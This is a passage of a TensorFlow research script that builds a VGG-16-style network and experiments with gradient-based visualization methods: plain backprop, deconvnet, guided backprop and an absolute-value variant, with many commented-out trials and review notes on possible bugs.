print('pool2', pool2.get_shape())
#grads_dict['conv2_2'] = tf.gradients(conv2_2, images, conv2_2)
#grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
#with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
# conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
# conv3_1 = tf.nn.relu(conv3_1)
# if not reuse:
# print('conv3_1', conv3_1.get_shape())
# #grads_dict['conv3_1'] = tf.gradients(conv3_1, images, conv3_1)
#with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
# conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
# conv3_2 = tf.nn.relu(conv3_2)
# if not reuse:
# print('conv3_2', conv3_2.get_shape())
# #grads_dict['conv3_2'] = tf.gradients(conv3_2, images, conv3_2)
#with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
# conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
# conv3_3 = tf.nn.relu(conv3_3)
# pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
# #pool3, argmax['pool3'] = tf.nn.max_pool_with_argmax(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
# if not reuse:
# print('pool3', pool3.get_shape())
# #grads_dict['conv3_3'] = tf.gradients(conv3_3, images, conv3_3)
# #grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
#with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
# conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
# conv4_1 = tf.nn.relu(conv4_1)
# if not reuse:
# print('conv4_1', conv4_1.get_shape())
# #grads_dict['conv4_1'] = tf.gradients(conv4_1, images, conv4_1)
#with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
# conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
# conv4_2 = tf.nn.relu(conv4_2)
# if not reuse:
# print('conv4_2', conv4_2.get_shape())
# #grads_dict['conv4_2'] = tf.gradients(conv4_2, images, conv4_2)
#with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
# conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
# conv4_3 = tf.nn.relu(conv4_3)
# pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
# #pool4, argmax['pool4'] = tf.nn.max_pool_with_argmax(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
# if not reuse:
# print('pool4', pool4.get_shape())
# #grads_dict['conv4_3'] = tf.gradients(conv4_3, images, conv4_3)
# #grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
#with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
# conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
# conv5_1 = tf.nn.relu(conv5_1)
# if not reuse:
# print('conv5_1', conv5_1.get_shape())
# #grads_dict['conv5_1'] = tf.gradients(conv5_1, images, conv5_1)
#
#with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
# conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
# conv5_2 = tf.nn.relu(conv5_2)
# if not reuse:
# print('conv5_2', conv5_2.get_shape())
# #grads_dict['conv5_2'] = tf.gradients(conv5_2, images, conv5_2)
#with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
# conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
# padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
# if bn:
# conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
# conv5_3 = tf.nn.relu(conv5_3)
# pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
# #pool5, argmax['pool5'] = tf.nn.max_pool_with_argmax(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
# if not reuse:
# print('pool5', pool5.get_shape())
# #grads_dict['conv5_3'] = tf.gradients(conv5_3, images, conv5_3)
# #grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
# trials/0
#grads_dict['pool1'] = tf.gradients(pool1, images)
#grads_dict['pool2'] = tf.gradients(pool2, images)
#grads_dict['pool3'] = tf.gradients(pool3, images)
#grads_dict['pool4'] = tf.gradients(pool4, images)
#grads_dict['pool5'] = tf.gradients(pool5, images)
SOBEL = (1==1)
if SOBEL:
#NEW_C = 64 # pool1
NEW_C = 128 # pool2
#NEW_C = 512 # pool25
sobel_x = tf.tile(sobel_x, (1,1,1,NEW_C))
sobel_y = tf.tile(sobel_y, (1,1,1,NEW_C))
#grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
#grads_dict['pool1_sobel_x'] = tf.gradients(pool1, images, sobel_x)
#grads_dict['pool1_sobel_y'] = tf.gradients(pool1, images, sobel_y)
#grads_dict['conv2_1'] = tf.gradients(conv2_1, images, conv2_1)
#grads_dict['conv2_2'] = tf.gradients(conv2_2, images, conv2_2)
grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
if SOBEL:
grads_dict['pool2_sobel_x'] = tf.gradients(pool2, images, sobel_x)
grads_dict['pool2_sobel_y'] = tf.gradients(pool2, images, sobel_y)
pool2 = tf.nn.l2_normalize(pool2, dim=3, epsilon=1e-12)
sobel_x = tf.nn.l2_normalize(sobel_x, dim=3, epsilon=1e-12)
sobel_y = tf.nn.l2_normalize(sobel_y, dim=3, epsilon=1e-12)
grads_dict['pool2_min_sobel_x'] = tf.gradients(pool2, images, (pool2-sobel_x))
grads_dict['pool2_min_sobel_y'] = tf.gradients(pool2, images, (pool2-sobel_y))
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
#grads_dict['pool5_sobel_x'] = tf.gradients(pool5, images, sobel_x)
#grads_dict['pool5_sobel_y'] = tf.gradients(pool5, images, sobel_y)
#grads_dict['pool5_min_sobel_x'] = tf.gradients(pool5, images, (pool5-sobel_x))
#grads_dict['pool5_min_sobel_y'] = tf.gradients(pool5, images, (pool5-sobel_y))
# trials/1
#grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
#print(grads_dict['conv1_1'][0].get_shape())
#grads_dict['2_conv1_1'] = tf.gradients(
# #grads_dict['conv1_1'], images, images)
# grads_dict['conv1_1'], images,grads_dict['conv1_1'])
#grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
#grads_dict['2_conv1_2'] = tf.gradients(
# grads_dict['conv1_2'], images,grads_dict['conv1_2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
#grads_dict['2_pool1'] = tf.gradients(
# grads_dict['pool1'], images, grads_dict['pool1'])
#grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
#
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_2)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_3)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_3)
# trials/1
# yayayaya
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_2, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_2, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_3, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_3, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_3, pool5)
# grad prop from 5
#grads_dict['pool5'] = tf.gradients(pool5, conv5_3, pool5)
#grads_dict['pool4'] = tf.gradients(pool4, conv4_3, grads_dict['pool5'])
#grads_dict['pool3'] = tf.gradients(pool3, conv3_3, grads_dict['pool4'])
#grads_dict['pool2'] = tf.gradients(pool2, conv2_2, grads_dict['pool3'])
##grads_dict['pool1'] = tf.gradients(pool1, conv1_2, grads_dict['pool2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, grads_dict['pool2'])
# fail if you prop it not from 5
#grads_dict['pool5'] = tf.gradients(pool5, conv5_3, pool5)
#grads_dict['pool4'] = tf.gradients(pool4, conv4_3, pool4)
#grads_dict['pool3'] = tf.gradients(pool3, conv3_3, grads_dict['pool4'])
#grads_dict['pool2'] = tf.gradients(pool2, conv2_2, grads_dict['pool3'])
##grads_dict['pool1'] = tf.gradients(pool1, conv1_2, grads_dict['pool2'])
#grads_dict['pool1'] = tf.gradients(pool1, images, grads_dict['pool2'])
#grads_dict['pool1_conv'] = tf.gradients(pool1, conv1_1, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, conv2_1, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, conv3_2, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, conv4_2, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, conv5_2, pool5)
#grads_dict['pool1_conv'] = tf.gradients(pool1, images, pool1)
#grads_dict['pool2_conv'] = tf.gradients(pool2, pool1, pool2)
#grads_dict['pool3_conv'] = tf.gradients(pool3, pool2, pool3)
#grads_dict['pool4_conv'] = tf.gradients(pool4, pool3, pool4)
#grads_dict['pool5_conv'] = tf.gradients(pool5, pool4, pool5)
# trials/2
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
#grads_dict['pool2'] = tf.gradients(pool2, conv1_2, pool2)
#grads_dict['pool3'] = tf.gradients(pool3, conv1_2, pool3)
#grads_dict['pool4'] = tf.gradients(pool4, conv1_2, pool4)
#grads_dict['pool5'] = tf.gradients(pool5, conv1_2, pool5)
# trials/3
#grads_dict['pool1'] = tf.gradients(pool1, conv1_2)
#grads_dict['pool2'] = tf.gradients(pool2, conv1_2)
#grads_dict['pool3'] = tf.gradients(pool3, conv1_2)
#grads_dict['pool4'] = tf.gradients(pool4, conv1_2)
#grads_dict['pool5'] = tf.gradients(pool5, conv1_2)
#pool4 = tf.nn.l2_normalize(pool4, dim=3, epsilon=1e-12)
#feat['pool1'] = pool1
#feat['pool2'] = pool2
#feat['pool3'] = pool3
#feat['pool3'] = tf.nn.l2_normalize(feat['pool3'], dim=3, epsilon=1e-12)
#feat['conv3_3'] = conv3_3
#feat['pool4'] = pool4
#feat['pool4'] = tf.nn.l2_normalize(feat['pool4'], dim=3, epsilon=1e-12)
#feat['pool5'] = pool5
# grad as feature trial 1
#feat['pool5'] = tf.gradients(pool5, pool4, pool5)
#feat['pool4'] = tf.gradients(pool4, pool3, pool4)
#feat['pool4'] = tf.nn.l2_normalize(feat['pool4'], dim=3, epsilon=1e-12)
#feat['pool3'] = tf.gradients(pool5, pool3, pool5)
#feat['pool3'] = tf.gradients(pool3, pool2, pool3)
return feat, grads_dict
def model_grad_deconv(images, is_training=False, reuse=False):
    """Build a VGG-16-style feature tower and "deconvnet" gradient maps.

    Feature backpropagation following the deconvnet rules, i.e. backpropagate
    only the positive values of the local gradients (the gradient of a feature
    map with respect to its predecessor).
    More formally, as written in the guided backprop paper:
    R^l_i = (R^{l+1}_i > 0) * R^{l+1}_i

    Obs: visually the same as the previous (plain) backprop, so I am wondering
    if the implementation of the ReLU gradient in TF does not already do this.

    Args:
        images: input batch, [batch_size, H, W, C].
        is_training: True if training mode (only consumed by batch norm, which
            is disabled below via ``bn = False``).
        reuse: reuse an already-built variable tower; also silences the shape
            prints.

    Returns:
        (feat, grads_dict): ``feat`` holds the raw 'pool3'/'pool4'/'pool5'
        feature maps; ``grads_dict`` holds the gradient visualizations keyed by
        pool name, built by whichever experiment flag (DECONV / ABS /
        GUIDED_BACKPROP) is enabled below.
    """
    if not reuse:
        print('inference::input', images.get_shape())
    bn = False  # batch norm disabled for every conv block below
    grads_dict = {}
    argmax = {}  # unused; kept for the max_pool_with_argmax variants left commented out
    feat = {}
    # --- VGG block 1: two 64-filter 3x3 convs + 2x2 max pool ---
    with tf.variable_scope('conv1_1', reuse=reuse) as scope: #1
        conv1_1 = tf.layers.conv2d(inputs=images, filters=64, kernel_size=(3,3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv1_1 = tf.contrib.layers.batch_norm(conv1_1, fused=True, decay=0.9, is_training=is_training)
        conv1_1 = tf.nn.relu(conv1_1)
        if not reuse:
            print('conv1_1', conv1_1.get_shape())
        ##grads_dict['conv1_1'] = tf.gradients(conv1_1, images, conv1_1)
    with tf.variable_scope('conv1_2', reuse=reuse) as scope: #2
        conv1_2 = tf.layers.conv2d(inputs=conv1_1, filters=64, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv1_2 = tf.contrib.layers.batch_norm(conv1_2, fused=True, decay=0.9, is_training=is_training)
        conv1_2 = tf.nn.relu(conv1_2)
        pool1 = tf.nn.max_pool(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
        #pool1,argmax['pool1'] = tf.nn.max_pool_with_argmax(conv1_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool1
        if not reuse:
            print('pool1', pool1.get_shape())
        #grads_dict['conv1_2'] = tf.gradients(conv1_2, images, conv1_2)
        #grads_dict['pool1'] = tf.gradients(pool1, conv1_2, pool1)
        #feat['pool1'] = pool1
    # --- VGG block 2: two 128-filter convs + pool ---
    with tf.variable_scope('conv2_1', reuse=reuse) as scope:#3
        conv2_1 = tf.layers.conv2d(inputs=pool1, filters=128, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv2_1 = tf.contrib.layers.batch_norm(conv2_1, fused=True, decay=0.9, is_training=is_training)
        conv2_1 = tf.nn.relu(conv2_1)
        if not reuse:
            print('conv2_1', conv2_1.get_shape())
        #grads_dict['conv2_1'] = tf.gradients(conv2_1, images, conv2_1)
    with tf.variable_scope('conv2_2', reuse=reuse) as scope:#4
        conv2_2 = tf.layers.conv2d(inputs=conv2_1, filters=128, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv2_2 = tf.contrib.layers.batch_norm(conv2_2, fused=True, decay=0.9, is_training=is_training)
        conv2_2 = tf.nn.relu(conv2_2)
        pool2 = tf.nn.max_pool(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
        #pool2, argmax['pool2'] = tf.nn.max_pool_with_argmax(conv2_2, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool2
        if not reuse:
            print('pool2', pool2.get_shape())
        #grads_dict['conv2_2'] = tf.gradients(conv2_2, images, conv2_2)
        #grads_dict['pool2'] = tf.gradients(pool2, images, pool2)
    # --- VGG block 3: three 256-filter convs + pool ---
    with tf.variable_scope('conv3_1', reuse=reuse) as scope:#5
        conv3_1 = tf.layers.conv2d(inputs=pool2, filters=256, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_1 = tf.contrib.layers.batch_norm(conv3_1, fused=True, decay=0.9, is_training=is_training)
        conv3_1 = tf.nn.relu(conv3_1)
        if not reuse:
            print('conv3_1', conv3_1.get_shape())
        #grads_dict['conv3_1'] = tf.gradients(conv3_1, images, conv3_1)
    with tf.variable_scope('conv3_2', reuse=reuse) as scope:#6
        conv3_2 = tf.layers.conv2d(inputs=conv3_1, filters=256, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_2 = tf.contrib.layers.batch_norm(conv3_2, fused=True, decay=0.9, is_training=is_training)
        conv3_2 = tf.nn.relu(conv3_2)
        if not reuse:
            print('conv3_2', conv3_2.get_shape())
        #grads_dict['conv3_2'] = tf.gradients(conv3_2, images, conv3_2)
    with tf.variable_scope('conv3_3', reuse=reuse) as scope:#7
        conv3_3 = tf.layers.conv2d(inputs=conv3_2, filters=256, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv3_3 = tf.contrib.layers.batch_norm(conv3_3, fused=True, decay=0.9, is_training=is_training)
        conv3_3 = tf.nn.relu(conv3_3)
        pool3 = tf.nn.max_pool(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
        #pool3, argmax['pool3'] = tf.nn.max_pool_with_argmax(conv3_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool3
        if not reuse:
            print('pool3', pool3.get_shape())
        #grads_dict['conv3_3'] = tf.gradients(conv3_3, images, conv3_3)
        #grads_dict['pool3'] = tf.gradients(pool3, images, pool3)
    # --- VGG block 4: three 512-filter convs + pool ---
    with tf.variable_scope('conv4_1', reuse=reuse) as scope:# 8
        conv4_1 = tf.layers.conv2d(inputs=pool3, filters=512, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_1 = tf.contrib.layers.batch_norm(conv4_1, fused=True, decay=0.9, is_training=is_training)
        conv4_1 = tf.nn.relu(conv4_1)
        if not reuse:
            print('conv4_1', conv4_1.get_shape())
        #grads_dict['conv4_1'] = tf.gradients(conv4_1, images, conv4_1)
    with tf.variable_scope('conv4_2', reuse=reuse) as scope:#9
        conv4_2 = tf.layers.conv2d(inputs=conv4_1, filters=512, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_2 = tf.contrib.layers.batch_norm(conv4_2, fused=True, decay=0.9, is_training=is_training)
        conv4_2 = tf.nn.relu(conv4_2)
        if not reuse:
            print('conv4_2', conv4_2.get_shape())
        #grads_dict['conv4_2'] = tf.gradients(conv4_2, images, conv4_2)
    with tf.variable_scope('conv4_3', reuse=reuse) as scope:#10
        conv4_3 = tf.layers.conv2d(inputs=conv4_2, filters=512, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv4_3 = tf.contrib.layers.batch_norm(conv4_3, fused=True, decay=0.9, is_training=is_training)
        conv4_3 = tf.nn.relu(conv4_3)
        pool4 = tf.nn.max_pool(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
        #pool4, argmax['pool4'] = tf.nn.max_pool_with_argmax(conv4_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool4
        if not reuse:
            print('pool4', pool4.get_shape())
        #grads_dict['conv4_3'] = tf.gradients(conv4_3, images, conv4_3)
        #grads_dict['pool4'] = tf.gradients(pool4, images, pool4)
    # --- VGG block 5: three 512-filter convs + pool ---
    with tf.variable_scope('conv5_1', reuse=reuse) as scope:#11
        conv5_1 = tf.layers.conv2d(inputs=pool4, filters=512, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv5_1 = tf.contrib.layers.batch_norm(conv5_1, fused=True, decay=0.9, is_training=is_training)
        conv5_1 = tf.nn.relu(conv5_1)
        if not reuse:
            print('conv5_1', conv5_1.get_shape())
        #grads_dict['conv5_1'] = tf.gradients(conv5_1, images, conv5_1)
    with tf.variable_scope('conv5_2', reuse=reuse) as scope:#12
        conv5_2 = tf.layers.conv2d(inputs=conv5_1, filters=512, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv5_2 = tf.contrib.layers.batch_norm(conv5_2, fused=True, decay=0.9, is_training=is_training)
        conv5_2 = tf.nn.relu(conv5_2)
        if not reuse:
            print('conv5_2', conv5_2.get_shape())
        #grads_dict['conv5_2'] = tf.gradients(conv5_2, images, conv5_2)
    with tf.variable_scope('conv5_3', reuse=reuse) as scope:#13
        conv5_3 = tf.layers.conv2d(inputs=conv5_2, filters=512, kernel_size=(3, 3),
                padding="same", kernel_initializer=tf.contrib.layers.xavier_initializer())
        if bn:
            conv5_3 = tf.contrib.layers.batch_norm(conv5_3, fused=True, decay=0.9, is_training=is_training)
        conv5_3 = tf.nn.relu(conv5_3)
        pool5 = tf.nn.max_pool(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
        #pool5, argmax['pool5'] = tf.nn.max_pool_with_argmax(conv5_3, ksize=[1,2,2,1], strides=[1,2,2,1], padding='VALID', name='pool') #pool5
        if not reuse:
            print('pool5', pool5.get_shape())
        #grads_dict['conv5_3'] = tf.gradients(conv5_3, images, conv5_3)
        #grads_dict['pool5'] = tf.gradients(pool5, images, pool5)
    # Only the three deepest pooled maps are exported as features.
    feat['pool3'] = pool3
    feat['pool4'] = pool4
    feat['pool5'] = pool5
    #grads_dict['pool1_raw'] = tf.gradients(pool1, images, pool1)
    #grads_dict['pool2_raw'] = tf.gradients(pool2, images, pool2)
    #grads_dict['pool3_raw'] = tf.gradients(pool3, images, pool3)
    #grads_dict['pool4_raw'] = tf.gradients(pool4, images, pool4)
    #grads_dict['pool5_raw'] = tf.gradients(pool5, images, pool5)
    # Experiment switches: exactly one gradient-backprop variant is enabled
    # ((1==1) is True, (0==1) is False). Currently only ABS is active.
    DECONV = (0==1)
    # random idea of mine to take the absolute value of features
    # before backpropagating them
    ABS = (1==1)
    GUIDED_BACKPROP = (0==1)
    # same as backprop so maybe tf implements relu backprop using deconv
    # I may have miscoded it because I don't understand why it is the same
    if GUIDED_BACKPROP:
        # Guided backprop: at each hop, zero out negative gradients AND mask by
        # the positivity of the forward activation.
        # NOTE(review): tf.gradients() returns a Python *list* of tensors, so
        # expressions like grads_dict['pool1']*(grads_dict['pool1']>0) compare a
        # list with 0 (Python 2 only) and repeat/empty the list rather than
        # masking elementwise -- presumably not the intent. Dead code while
        # GUIDED_BACKPROP is False, but verify before re-enabling.
        # grad for 1
        grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
        grads_dict['pool1'] = grads_dict['pool1']*(grads_dict['pool1']>0)
        #grads_dict['pool1'] = grads_dict['pool1']*(pool1>0)
        # grad for 2
        grads_dict['pool2'] = tf.gradients(pool2, pool1, pool2)
        grads_dict['pool2'] = grads_dict['pool2']*(grads_dict['pool2']>0)
        print('grads_dict[pool2].shape', grads_dict['pool2'][0].get_shape())
        grads_dict['pool2'] = grads_dict['pool2'][0]*tf.cast((pool1>0), tf.float32)
        grads_dict['pool2'] = tf.gradients(pool1, images, grads_dict['pool2'])
        grads_dict['pool2'] = grads_dict['pool2']*(grads_dict['pool2']>0)
        #grads_dict['pool2'] = grads_dict['pool2']*(pool2>0)
        # grad for 3
        grads_dict['pool3'] = tf.gradients(pool3, pool2, pool3)
        grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
        grads_dict['pool3'] = grads_dict['pool3'][0]*tf.cast(pool2>0, tf.float32)
        #print('grads_dict[pool3].shape', grads_dict['pool3'][0].get_shape())
        grads_dict['pool3'] = tf.gradients(pool2, pool1, grads_dict['pool3'])
        grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
        grads_dict['pool3'] = grads_dict['pool3'][0]*tf.cast(pool1>0, tf.float32)
        grads_dict['pool3'] = tf.gradients(pool1, images, grads_dict['pool3'])
        grads_dict['pool3'] = grads_dict['pool3']*(grads_dict['pool3']>0)
        #grads_dict['pool3'] = grads_dict['pool3']*(pool3>0)
        # grad for 4
        grads_dict['pool4'] = tf.gradients(pool4, pool3, pool4)
        grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
        grads_dict['pool4'] = grads_dict['pool4'][0]*tf.cast(pool3>0, tf.float32)
        grads_dict['pool4'] = tf.gradients(pool3, pool2, grads_dict['pool4'])
        grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
        grads_dict['pool4'] = grads_dict['pool4'][0]*tf.cast(pool2>0, tf.float32)
        grads_dict['pool4'] = tf.gradients(pool2, pool1, grads_dict['pool4'])
        grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
        grads_dict['pool4'] = grads_dict['pool4'][0]*tf.cast(pool1>0, tf.float32)
        grads_dict['pool4'] = tf.gradients(pool1, images, grads_dict['pool4'])
        grads_dict['pool4'] = grads_dict['pool4']*(grads_dict['pool4']>0)
        #grads_dict['pool4'] = grads_dict['pool4']*(pool4>0)
        # grad for 5
        grads_dict['pool5'] = tf.gradients(pool5, pool4, pool5)
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        grads_dict['pool5'] = grads_dict['pool5'][0]*tf.cast(pool4>0, tf.float32)
        grads_dict['pool5'] = tf.gradients(pool4, pool3, grads_dict['pool5'])
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        grads_dict['pool5'] = grads_dict['pool5'][0]*tf.cast(pool3>0, tf.float32)
        grads_dict['pool5'] = tf.gradients(pool3, pool2, grads_dict['pool5'])
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        grads_dict['pool5'] = grads_dict['pool5'][0]*tf.cast(pool2>0, tf.float32)
        grads_dict['pool5'] = tf.gradients(pool2, pool1, grads_dict['pool5'])
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        grads_dict['pool5'] = grads_dict['pool5'][0]*tf.cast(pool1>0, tf.float32)
        grads_dict['pool5'] = tf.gradients(pool1, images, grads_dict['pool5'])
        grads_dict['pool5'] = grads_dict['pool5']*(grads_dict['pool5']>0)
        #grads_dict['pool5'] = grads_dict['pool5']*(pool5>0)
    # gradmaps are less noisy. Test your stuff on this gradient.
    # yes it means more tests ... :(
    if ABS:
        # ABS variant: backpropagate level by level, replacing each intermediate
        # gradient with its absolute value (relu(x) + relu(-x) == |x|).
        # grad for 1
        grads_dict['pool1'] = tf.gradients(pool1, images, pool1)
        #grads_dict['pool1'] = tf.abs(grads_dict['pool1'])
        #print(grads_dict['pool1'][0].get_shape())
        #raw_input('wait')
        # grad for 2
        grads_dict['pool2'] = tf.gradients(pool2, pool1, pool2)
        grads_dict['pool2'] = tf.nn.relu(grads_dict['pool2'][0]) + tf.nn.relu(-grads_dict['pool2'][0])
        grads_dict['pool2'] = tf.gradients(pool1, images, grads_dict['pool2'])
        #grads_dict['pool2'] = tf.abs(grads_dict['pool2'])
        ## grad for 3
        grads_dict['pool3'] = tf.gradients(pool3, pool2, pool3)
        grads_dict['pool3'] = tf.nn.relu(grads_dict['pool3'][0]) + tf.nn.relu(-grads_dict['pool3'][0])
        grads_dict['pool3'] = tf.gradients(pool2, pool1, grads_dict['pool3'])
        grads_dict['pool3'] = tf.nn.relu(grads_dict['pool3'][0]) + tf.nn.relu(-grads_dict['pool3'][0])
        grads_dict['pool3'] = tf.gradients(pool1, images, grads_dict['pool3'])
        #grads_dict['pool3'] = tf.nn.relu(grads_dict['pool3'][0]) + tf.nn.relu(-grads_dict['pool3'][0])
        #print(grads_dict['pool1'][0].get_shape())
        #raw_input('wait')
        ## grad for 4
        # NOTE(review): this chain starts with tf.gradients(pool4, pool4, pool4)
        # (an identity hop) and then jumps pool4 -> pool2 directly, skipping the
        # abs step at the pool3 level used in the pool3/pool5 chains --
        # presumably a copy-paste slip; confirm whether pool4 -> pool3 -> pool2
        # was intended.
        grads_dict['pool4'] = tf.gradients(pool4, pool4, pool4)
        grads_dict['pool4'] = tf.nn.relu(grads_dict['pool4'][0]) + tf.nn.relu(-grads_dict['pool4'][0])
        grads_dict['pool4'] = tf.gradients(pool4, pool2, grads_dict['pool4'])
        grads_dict['pool4'] = tf.nn.relu(grads_dict['pool4'][0]) + tf.nn.relu(-grads_dict['pool4'][0])
